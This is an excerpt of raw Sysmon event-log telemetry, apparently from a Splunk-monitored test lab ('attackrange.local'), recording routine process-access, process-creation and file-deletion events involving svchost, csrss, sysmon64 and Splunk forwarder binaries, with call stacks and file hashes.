07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:25.563{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.563{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.550{0C1E0330-F351-60EB-4B79-00000000D001}1272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45965F2B70FFA4690D52C82E9EE36A9A,SHA256=3EB2956ABEBD5F4023476B08AC340A997AF1ADBA99B067AF58C0E2CEDB203253,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D56480BC466A5AB86C9DC6C25702D12E,SHA256=7631F43EAFFA9992E0E2EA03B512F697E513A8880965330D84A7C524CCE4EED4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B23052D07BD459051FD89300488674,SHA256=979A7B4BBE20137AEC0F80BBC66E390497C20F1A9C34AAD96425FD800A96E21C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:26.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4549F4E5440BD13DAB159A16101690FC,SHA256=27B7A57352D5D35228442EB91D1395479989E4C6FBEBEE47B5B1B96D1C657310,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.938{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F352-60EB-4D79-00000000D001}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 